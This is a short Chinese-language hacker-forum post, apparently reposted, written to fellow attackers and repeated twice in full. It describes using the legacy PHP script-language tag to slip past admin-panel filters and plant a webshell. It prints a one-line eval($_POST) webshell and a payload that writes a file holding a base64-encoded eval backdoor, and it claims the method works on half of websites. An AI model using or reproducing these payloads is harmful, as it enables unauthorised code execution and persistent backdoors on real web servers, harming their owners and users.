各位黑客好
小弟不才创建了其他入侵方法
发现50%网站使用这种方法拿webshell比较容易
思路是利用JS来创建文件写shell
(注意的是这个方法只能后台玩因为好像只能PHP打印JS才可以生成文件不知道提前道友有什么收录可以和我共享的)
这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!
<?php echo "test";?>
<script language="php"> </script>
<script language="php">echo "test";</script>
这个标签是今天的重点,大多都不熟悉的!而且程序员在网站后台过滤插一句话
<script language="php">eval ($_POST[1]);</script>
这个是一句话意思是JS打印PHP文件
接下来就是我想到了一个方法下面这个代码意思相信大家已经明白了吧
<script language="PhP">fputs(fopen('t.php',w),
base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydycmNjdHYnXSk7Pz4="));</script>
我起一个名字叫XR 他不同于XSS已经出了他的范围了
以上文章是骇客协会精华请带小尾巴(出骇客协会)
小弟不才创建了其他入侵方法
发现50%网站使用这种方法拿webshell比较容易
思路是利用JS来创建文件写shell
(注意的是这个方法只能后台玩因为好像只能PHP打印JS才可以生成文件不知道提前道友有什么收录可以和我共享的)
这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!
<?php echo "test";?>
<script language="php"> </script>
<script language="php">echo "test";</script>
这个标签是今天的重点,大多都不熟悉的!而且程序员在网站后台过滤插一句话
<script language="php">eval ($_POST[1]);</script>
这个是一句话意思是JS打印PHP文件
接下来就是我想到了一个方法下面这个代码意思相信大家已经明白了吧
<script language="PhP">fputs(fopen('t.php',w),
base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydycmNjdHYnXSk7Pz4="));</script>
我起一个名字叫XR 他不同于XSS已经出了他的范围了
以上文章是骇客协会精华请带小尾巴(出骇客协会)
